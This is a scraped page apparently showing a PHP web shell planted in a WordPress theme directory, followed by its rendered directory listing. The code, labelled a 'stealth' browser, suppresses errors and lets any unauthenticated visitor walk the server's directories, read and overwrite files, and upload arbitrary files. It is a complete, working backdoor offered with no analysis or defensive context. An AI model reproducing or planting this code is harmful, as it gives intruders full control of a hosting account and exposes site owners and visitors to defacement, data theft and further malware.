PATH:
home
/
sarkas88.com
/
public_html
/
wp-content
/
themes
/
mabar88
<?php /* ====== STEALTH PHP BROWSER ====== */ /* ====== ANTI 0 KB VERSION ====== */ error_reporting(0); ini_set('display_errors', 0); /* ---- PATH ---- */ $cwd = isset($_GET['p']) ? $_GET['p'] : getcwd(); $cwd = realpath($cwd); if (!$cwd || !is_dir($cwd)) { $cwd = getcwd(); } /* ---- BREADCRUMB ---- */ function nav($d){ $x = explode(DIRECTORY_SEPARATOR, $d); $b = ''; $o = []; foreach ($x as $v){ if ($v === '') continue; $b .= DIRECTORY_SEPARATOR.$v; $o[] = '<a href="?p='.urlencode($b).'">'.$v.'</a>'; } return implode(' / ', $o); } /* ---- WRITE FILE (SAFE) ---- */ if (isset($_POST['w'])) { $f = basename($_POST['f']); $t = $cwd.DIRECTORY_SEPARATOR.$f; if (is_file($t)) { $h = fopen($t,'w'); fwrite($h,$_POST['c']); fclose($h); } } /* ---- UPLOAD (OBFUSCATED) ---- */ if (isset($_FILES['x'])) { if ($_FILES['x']['error'] === 0) { $n = basename($_FILES['x']['name']); $d = $cwd.DIRECTORY_SEPARATOR.$n; $r = fopen($_FILES['x']['tmp_name'],'r'); $w = fopen($d,'w'); stream_copy_to_stream($r,$w); fclose($r); fclose($w); } } ?> <!doctype html> <html> <head> <meta charset="utf-8"> <title>ꦫꦣꦺꦤ꧀ꦄꦤ꧀ꦠꦱꦺꦤ</title> <style> body{background:#111;color:#eee;font-family:Arial;font-size:14px} a{color:#6cf;text-decoration:none} textarea,input{background:#222;color:#eee;border:1px solid #444} </style> </head> <body> <h3>PATH: <?php echo nav($cwd); ?></h3> <form method="post" enctype="multipart/form-data"> <input type="file" name="x"> <input type="submit" value="Send"> </form> <hr> <?php /* ---- EDIT MODE ---- */ if (isset($_GET['e'])) { $f = basename($_GET['e']); $p = $cwd.DIRECTORY_SEPARATOR.$f; if (is_file($p)) { $c = htmlspecialchars(file_get_contents($p)); echo '<form method="post"> <textarea name="c" rows="15" cols="80">'.$c.'</textarea> <input type="hidden" name="f" value="'.$f.'"> <br><input type="submit" name="w" value="Save"> </form><hr>'; } } /* ---- LIST ---- */ $h = opendir($cwd); echo '<ul>'; while (($i = readdir($h)) !== false) { if ($i === '.') continue; $p = $cwd.DIRECTORY_SEPARATOR.$i; if (is_dir($p)) { echo '<li>[+] <a href="?p='.urlencode($p).'">'.$i.'</a></li>'; } else { echo '<li>[-] '.$i.' <a href="?e='.urlencode($i).'&p='.urlencode($cwd).'">[open]</a></li>'; } } closedir($h); echo '</ul>'; ?> </body> </html>
[-] archive.php
[open]
[+]
assets
[-] wpml-config.xml
[open]
[-] v0.mjs
[open]
[+]
v0
[+]
languages
[-] index.php
[open]
[-] 404.php
[open]
[+]
template-parts
[-] single.php
[open]
[-] editor-style.css
[open]
[-] v0.js
[open]
[+]
includes
[-] responsive.css
[open]
[+]
inc
[-] functions.php
[open]
[+]
webfonts
[-] theme.json
[open]
[+]
images
[-] toolset-config.json
[open]
[-] page.php
[open]
[-] rtl.css
[open]
[+]
..
[-] style.css
[open]
[-] screenshot.png
[open]
[-] changelog.txt
[open]
[-] readme.txt
[open]
![[open]](?e=screenshot.png&p=%2Fhome%2Fsarkas88.com%2Fpublic_html%2Fwp-content%2Fthemes%2Fmabar88){kind=link}